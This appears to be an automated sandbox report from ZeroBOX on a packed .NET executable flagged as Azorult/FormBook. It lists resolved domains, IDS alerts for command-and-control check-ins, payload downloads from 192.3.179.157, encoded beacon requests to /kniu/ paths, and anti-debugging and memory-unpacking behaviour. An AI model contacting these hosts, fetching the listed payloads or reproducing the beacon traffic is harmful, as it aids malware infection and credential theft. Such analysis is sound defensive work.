Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6401	Sept. 30, 2023, 1:04 p.m.	Sept. 30, 2023, 1:10 p.m.

Size	792.5KB
Type	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
MD5	`ea462e6077aa3e3c7573dd51206c7e4e`
SHA256	`97d8da6df2393f88c7a4b101dd496add87bd218a859b5116fddd253e05cfbd97`
CRC32	`2EC9D525`
ssdeep	`12288:YFE9CAFtdmT26QGo1cZjvzeeZyLmigfRW:Iob56vo1cZj7eeZjR`
Yara	UPX_Zero - UPX packed file PE_Header_Zero - PE File Signature IsPE32 - (no description) Is_DotNET_EXE - (no description) Win32_Trojan_PWS_Net_1_Zero - Win32 Trojan PWS .NET Azorult

Wtwvjbwnht.exe "C:\Users\test22\AppData\Local\Temp\Wtwvjbwnht.exe"
2552
- Wtwvjbwnht.exe C:\Users\test22\AppData\Local\Temp\Wtwvjbwnht.exe
  2768

Name	Response	Post-Analysis Lookup
www.poultry-symposium.com	A 85.128.134.237	85.128.134.237
www.palatepursuits.cfd	A 104.21.21.57 A 172.67.196.133	104.21.21.57
www.frefire.top	A 67.223.117.37	67.223.117.37
www.8956kjw1.com	CNAME cname.bf723.com A 103.71.154.243	103.71.154.243
www.tsygy.com	A 23.104.137.185	23.104.137.185
www.pengeloladata.click
www.siteapp.fun	A 81.171.28.43	23.82.12.37
www.theartboxslidell.com	A 199.59.243.224	199.59.243.224
www.xxkxcfkujyeft.xyz	A 216.240.130.67 CNAME xxkxcfkujyeft.xyz	216.240.130.67
www.prosourcegraniteinc.com	A 216.239.34.21 A 216.239.36.21 A 216.239.38.21 A 216.239.32.21	216.239.34.21
www.flyingfoxnb.com	A 216.40.34.41	216.40.34.41
www.onlyleona.com	A 172.67.132.228 A 104.21.13.143	104.21.13.143
www.sqlite.org	A 45.33.6.223	45.33.6.223

IP Address	Status	Action
103.71.154.243	Active	Moloch
164.124.101.2	Active	Moloch
172.67.132.228	Active	Moloch
172.67.196.133	Active	Moloch
192.3.179.157	Active	Moloch
199.59.243.224	Active	Moloch
216.239.32.21	Active	Moloch
216.240.130.67	Active	Moloch
216.40.34.41	Active	Moloch
23.104.137.185	Active	Moloch
45.33.6.223	Active	Moloch
67.223.117.37	Active	Moloch
81.171.28.43	Active	Moloch
85.128.134.237	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 103.71.154.243:80 -> 192.168.56.101:49183	2221010	SURICATA HTTP unable to match response to request	Generic Protocol Command Decode
TCP 103.71.154.243:80 -> 192.168.56.101:49184	2221010	SURICATA HTTP unable to match response to request	Generic Protocol Command Decode
TCP 192.168.56.101:49163 -> 192.3.179.157:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 192.3.179.157:80 -> 192.168.56.101:49163	2014819	ET INFO Packed Executable Download	Misc activity
TCP 192.3.179.157:80 -> 192.168.56.101:49163	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 192.3.179.157:80 -> 192.168.56.101:49163	2016538	ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download	Potentially Bad Traffic
TCP 192.3.179.157:80 -> 192.168.56.101:49163	2021076	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response	Potentially Bad Traffic
TCP 192.168.56.101:49186 -> 67.223.117.37:80	2023882	ET INFO HTTP Request to a *.top domain	Potentially Bad Traffic
UDP 192.168.56.101:52753 -> 164.124.101.2:53	2023883	ET DNS Query to a *.top domain - Likely Hostile	Potentially Bad Traffic
TCP 192.168.56.101:49186 -> 67.223.117.37:80	2031412	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.101:49186 -> 67.223.117.37:80	2031089	ET HUNTING Request to .TOP Domain with Minimal Headers	Potentially Bad Traffic
TCP 192.168.56.101:49174 -> 216.240.130.67:80	2031412	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.101:49174 -> 216.240.130.67:80	2031088	ET HUNTING Request to .XYZ Domain with Minimal Headers	Potentially Bad Traffic
TCP 192.168.56.101:49172 -> 199.59.243.224:80	2031412	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.101:49176 -> 172.67.132.228:80	2031412	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.101:49181 -> 85.128.134.237:80	2031412	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.101:49190 -> 216.40.34.41:80	2031412	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.101:49168 -> 216.239.32.21:80	2031412	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.101:49188 -> 81.171.28.43:80	2031412	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.101:49178 -> 23.104.137.185:80	2031412	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected

Suricata TLS

No Suricata TLS

Checks if process is being debugged by a debugger (2 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent Sept. 30, 2023, 1:04 p.m.			0	0
IsDebuggerPresent Sept. 30, 2023, 1:04 p.m.			0	0

Uses Windows APIs to generate a cryptographic key (3 events)

Time & API	Arguments	Status	Return
CryptExportKey Sept. 30, 2023, 1:04 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0088b7e8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 30, 2023, 1:04 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0088b7e8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 30, 2023, 1:04 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0088b728 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx Sept. 30, 2023, 1:04 p.m.		1	1	0

One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.

HTTP traffic contains suspicious features which may be indicative of malware related traffic (11 events)

suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://192.3.179.157/zw/Zlonloydc.dat
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://192.3.179.157/690/TiWorkers.exe
suspicious_features	GET method with no useragent header	suspicious_request	GET http://www.prosourcegraniteinc.com/kniu/?-z0gsLA=9xFgCh3s8l/k2B8O7aAt9yPceR5ZLMimGcu4Dy10KR8z2IhjbkPtetaY6rVQOSuqKBOJhR+SeENFOh5XwKmANMDhEFCrb4byHJuvuWU=&ue-_=0C5fuT6rcako
suspicious_features	GET method with no useragent header	suspicious_request	GET http://www.theartboxslidell.com/kniu/?-z0gsLA=pbzwZ3uv6ZLNK9kOZcORaqCkpmWHCySL5KPRtIvuGjYxhe5HL3eyc57X4ozDsIqy99XGgcN1QrQuWuftpLGszPSRgY0zgb673Mjl5VE=&ue-_=0C5fuT6rcako
suspicious_features	GET method with no useragent header	suspicious_request	GET http://www.xxkxcfkujyeft.xyz/kniu/?-z0gsLA=i0HwDxosD6vP35vKxXt8TqB5hgt09UAmGu6yXsGJ7KHeDbKCAxtr8kYkpXafqSJ5CWKS4JQhNIcZa2fBS8/HEz0POFGF5EDYOp/zgDU=&ue-_=0C5fuT6rcako
suspicious_features	GET method with no useragent header	suspicious_request	GET http://www.onlyleona.com/kniu/?-z0gsLA=eul8o7FRTpzZYv+GqkkzOpE5tEZO7cuUa8jf7YGp4uFOB2eW2y1ALY7ycZgKlFf7jddzg63rMJOPKD43r6dZxMpJnJONv2M7MFgI8Mw=&ue-_=0C5fuT6rcako
suspicious_features	GET method with no useragent header	suspicious_request	GET http://www.tsygy.com/kniu/?-z0gsLA=bJ36cMi4kupHJe0Hctq9gMewB+uvjmGDqwrfSqfgcqRhOtXAC1zMZIlHhDCyIhSJCFAYjWOLktx1yjWN3ai585tt7uX+B1FmFo0jbF0=&ue-_=0C5fuT6rcako
suspicious_features	GET method with no useragent header	suspicious_request	GET http://www.poultry-symposium.com/kniu/?-z0gsLA=40XX9Ytbs/otsI+0yUtAogrXy8SgXZWV889z9rydVcgoc+JCy8vgR1icdWU6u94Njq5xrtv7NQnpOX1iusCyLYuLxlHkdapdsh1Ymak=&ue-_=0C5fuT6rcako
suspicious_features	GET method with no useragent header	suspicious_request	GET http://www.frefire.top/kniu/?-z0gsLA=w8rKBuSUIg6smCThP+RZr8URK2cMAOxRwdqHG6Uo67OOMeio1zBa/jWrwyXT3+M/9aqTr1N41d9bzE5WN9beyeWExgAtk5mD8L1zbeQ=&ue-_=0C5fuT6rcako
suspicious_features	GET method with no useragent header	suspicious_request	GET http://www.siteapp.fun/kniu/?-z0gsLA=6sBKYXqHQWHKIO2IG+2EqtcAj7thqVpOenJ3Aw9YNEL5O7rEWmoX1sx8Xe3NA3a7pLf2GEiO8AkwTW2yzvekojaHRlDYosZEDLTR5OQ=&ue-_=0C5fuT6rcako
suspicious_features	GET method with no useragent header	suspicious_request	GET http://www.flyingfoxnb.com/kniu/?-z0gsLA=2khzscf+uoNd4qXDJMvMlsCGRf74adwr4dCZmsSaM5bi7vY8OWwGY+oUQIQbfdmtzbAFku/2CGFb1XO6VHKJWfD6Hx+uzWgInko6T2A=&ue-_=0C5fuT6rcako

Performs some HTTP requests (23 events)

request	GET http://192.3.179.157/zw/Zlonloydc.dat
request	GET http://192.3.179.157/690/TiWorkers.exe
request	POST http://www.prosourcegraniteinc.com/kniu/
request	GET http://www.prosourcegraniteinc.com/kniu/?-z0gsLA=9xFgCh3s8l/k2B8O7aAt9yPceR5ZLMimGcu4Dy10KR8z2IhjbkPtetaY6rVQOSuqKBOJhR+SeENFOh5XwKmANMDhEFCrb4byHJuvuWU=&ue-_=0C5fuT6rcako
request	GET http://www.sqlite.org/2021/sqlite-dll-win32-x86-3340000.zip
request	GET http://www.sqlite.org/2016/sqlite-dll-win32-x86-3110000.zip
request	POST http://www.theartboxslidell.com/kniu/
request	GET http://www.theartboxslidell.com/kniu/?-z0gsLA=pbzwZ3uv6ZLNK9kOZcORaqCkpmWHCySL5KPRtIvuGjYxhe5HL3eyc57X4ozDsIqy99XGgcN1QrQuWuftpLGszPSRgY0zgb673Mjl5VE=&ue-_=0C5fuT6rcako
request	POST http://www.xxkxcfkujyeft.xyz/kniu/
request	GET http://www.xxkxcfkujyeft.xyz/kniu/?-z0gsLA=i0HwDxosD6vP35vKxXt8TqB5hgt09UAmGu6yXsGJ7KHeDbKCAxtr8kYkpXafqSJ5CWKS4JQhNIcZa2fBS8/HEz0POFGF5EDYOp/zgDU=&ue-_=0C5fuT6rcako
request	POST http://www.onlyleona.com/kniu/
request	GET http://www.onlyleona.com/kniu/?-z0gsLA=eul8o7FRTpzZYv+GqkkzOpE5tEZO7cuUa8jf7YGp4uFOB2eW2y1ALY7ycZgKlFf7jddzg63rMJOPKD43r6dZxMpJnJONv2M7MFgI8Mw=&ue-_=0C5fuT6rcako
request	POST http://www.tsygy.com/kniu/
request	GET http://www.tsygy.com/kniu/?-z0gsLA=bJ36cMi4kupHJe0Hctq9gMewB+uvjmGDqwrfSqfgcqRhOtXAC1zMZIlHhDCyIhSJCFAYjWOLktx1yjWN3ai585tt7uX+B1FmFo0jbF0=&ue-_=0C5fuT6rcako
request	POST http://www.poultry-symposium.com/kniu/
request	GET http://www.poultry-symposium.com/kniu/?-z0gsLA=40XX9Ytbs/otsI+0yUtAogrXy8SgXZWV889z9rydVcgoc+JCy8vgR1icdWU6u94Njq5xrtv7NQnpOX1iusCyLYuLxlHkdapdsh1Ymak=&ue-_=0C5fuT6rcako
request	POST http://www.frefire.top/kniu/
request	GET http://www.frefire.top/kniu/?-z0gsLA=w8rKBuSUIg6smCThP+RZr8URK2cMAOxRwdqHG6Uo67OOMeio1zBa/jWrwyXT3+M/9aqTr1N41d9bzE5WN9beyeWExgAtk5mD8L1zbeQ=&ue-_=0C5fuT6rcako
request	POST http://www.siteapp.fun/kniu/
request	GET http://www.siteapp.fun/kniu/?-z0gsLA=6sBKYXqHQWHKIO2IG+2EqtcAj7thqVpOenJ3Aw9YNEL5O7rEWmoX1sx8Xe3NA3a7pLf2GEiO8AkwTW2yzvekojaHRlDYosZEDLTR5OQ=&ue-_=0C5fuT6rcako
request	POST http://www.flyingfoxnb.com/kniu/
request	GET http://www.flyingfoxnb.com/kniu/?-z0gsLA=2khzscf+uoNd4qXDJMvMlsCGRf74adwr4dCZmsSaM5bi7vY8OWwGY+oUQIQbfdmtzbAFku/2CGFb1XO6VHKJWfD6Hx+uzWgInko6T2A=&ue-_=0C5fuT6rcako
request	POST http://www.palatepursuits.cfd/kniu/

Sends data using the HTTP POST Method (10 events)

request	POST http://www.prosourcegraniteinc.com/kniu/
request	POST http://www.theartboxslidell.com/kniu/
request	POST http://www.xxkxcfkujyeft.xyz/kniu/
request	POST http://www.onlyleona.com/kniu/
request	POST http://www.tsygy.com/kniu/
request	POST http://www.poultry-symposium.com/kniu/
request	POST http://www.frefire.top/kniu/
request	POST http://www.siteapp.fun/kniu/
request	POST http://www.flyingfoxnb.com/kniu/
request	POST http://www.palatepursuits.cfd/kniu/

Resolves a suspicious Top Level Domain (TLD) (1 event)

domain

www.frefire.top

description

Generic top level domain TLD

Allocates read-write-execute memory (usually to unpack itself) (50 out of 52 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory Sept. 30, 2023, 1:04 p.m.	process_identifier: 2552 region_size: 1572864 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00690000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 30, 2023, 1:04 p.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x007d0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 30, 2023, 1:04 p.m.	process_identifier: 2552 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x727a1000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 30, 2023, 1:04 p.m.	process_identifier: 2552 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x727a2000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 30, 2023, 1:04 p.m.	process_identifier: 2552 region_size: 524288 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00430000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 30, 2023, 1:04 p.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00470000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 30, 2023, 1:04 p.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x002a2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 30, 2023, 1:04 p.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x002d5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 30, 2023, 1:04 p.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x002db000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 30, 2023, 1:04 p.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x002d7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 30, 2023, 1:04 p.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x002bc000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 30, 2023, 1:04 p.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x005e0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 30, 2023, 1:04 p.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x002aa000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 30, 2023, 1:04 p.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x002ca000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 30, 2023, 1:04 p.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x002c7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 30, 2023, 1:04 p.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x002c6000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 30, 2023, 1:04 p.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x002cb000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 30, 2023, 1:04 p.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x002ac000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 30, 2023, 1:04 p.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x005e1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 30, 2023, 1:04 p.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x005e2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 30, 2023, 1:04 p.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x005e3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 30, 2023, 1:04 p.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x005e4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 30, 2023, 1:04 p.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x005e5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 30, 2023, 1:04 p.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x005e6000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 30, 2023, 1:04 p.m.	process_identifier: 2552 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x005e7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 30, 2023, 1:04 p.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x005e9000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 30, 2023, 1:04 p.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x002bd000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 30, 2023, 1:04 p.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0550f000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 30, 2023, 1:04 p.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05500000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 30, 2023, 1:04 p.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x005ea000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 30, 2023, 1:04 p.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x005eb000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 30, 2023, 1:04 p.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x005ec000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 30, 2023, 1:04 p.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x005ed000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 30, 2023, 1:04 p.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x005ee000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 30, 2023, 1:04 p.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x005ef000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 30, 2023, 1:04 p.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05560000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 30, 2023, 1:04 p.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05561000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 30, 2023, 1:04 p.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x002be000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 30, 2023, 1:04 p.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05562000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 30, 2023, 1:04 p.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05563000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 30, 2023, 1:04 p.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05564000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 30, 2023, 1:04 p.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05565000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 30, 2023, 1:04 p.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05566000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 30, 2023, 1:04 p.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05567000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 30, 2023, 1:04 p.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05568000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 30, 2023, 1:04 p.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05569000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 30, 2023, 1:04 p.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0556a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 30, 2023, 1:04 p.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0556b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 30, 2023, 1:04 p.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x002bf000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 30, 2023, 1:04 p.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0556c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

Checks adapter addresses which can be used to detect virtual network interfaces (1 event)

Time & API	Arguments	Status	Return	Repeated
